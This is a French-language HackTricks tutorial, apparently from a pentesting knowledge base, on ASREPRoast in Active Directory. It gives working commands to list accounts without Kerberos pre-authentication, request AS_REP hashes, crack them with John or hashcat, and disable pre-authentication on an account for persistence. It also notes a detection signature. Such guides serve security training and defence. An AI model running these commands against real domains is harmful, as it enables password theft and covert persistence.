hacktricks/windows-hardening/active-directory-methodology/asreproast.md

7.4 KiB

ASREPRoast

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Rejoignez le serveur HackenProof Discord pour communiquer avec des hackers expérimentés et des chasseurs de primes !

Perspectives de piratage
Engagez-vous avec du contenu qui explore les sensations et les défis du piratage

Actualités de piratage en temps réel
Restez à jour avec le monde du piratage rapide grâce aux actualités et aux informations en temps réel

Dernières annonces
Restez informé des dernières primes de bugs lancées et des mises à jour cruciales de la plateforme

Rejoignez-nous sur Discord et commencez à collaborer avec les meilleurs hackers dès aujourd'hui !

ASREPRoast

L'attaque ASREPRoast recherche les utilisateurs sans l'attribut de pré-authentification Kerberos requis (DONT_REQ_PREAUTH).

Cela signifie que n'importe qui peut envoyer une demande AS_REQ au DC au nom de l'un de ces utilisateurs et recevoir un message AS_REP. Ce dernier type de message contient un morceau de données chiffrées avec la clé utilisateur d'origine, dérivée de son mot de passe. En utilisant ce message, le mot de passe de l'utilisateur peut être craqué hors ligne.

De plus, aucun compte de domaine n'est nécessaire pour effectuer cette attaque, seulement une connexion au DC. Cependant, avec un compte de domaine, une requête LDAP peut être utilisée pour récupérer les utilisateurs sans pré-authentification Kerberos dans le domaine. Sinon, les noms d'utilisateur doivent être devinés.

Énumération des utilisateurs vulnérables (nécessite des informations d'identification de domaine)

Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView

Demande de message AS_REP

{% code title="Utilisation de Linux" %}

#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast

{% code title="Utilisation de Windows" %}

.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)

{% endcode %}

{% hint style="warning" %} La méthode AS-REP Roasting avec Rubeus générera un 4768 avec un type de chiffrement de 0x17 et un type de préauthentification de 0. {% endhint %}

Crackage

john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

Persistance

Forcer preauth non requis pour un utilisateur pour lequel vous avez les permissions GenericAll (ou les permissions pour écrire des propriétés) :

Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose

Références

Plus d'informations sur l'attaque AS-REP Roasting sur ired.team

Rejoignez le serveur HackenProof Discord pour communiquer avec des hackers expérimentés et des chasseurs de primes !

Perspectives sur le piratage
Engagez-vous avec du contenu qui explore les sensations et les défis du piratage

Actualités sur le piratage en temps réel
Restez à jour avec le monde du piratage en évolution rapide grâce à des actualités et des informations en temps réel

Dernières annonces
Restez informé des dernières primes de bugs lancées et des mises à jour cruciales de la plateforme

Rejoignez-nous sur Discord et commencez à collaborer avec les meilleurs hackers dès aujourd'hui !

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥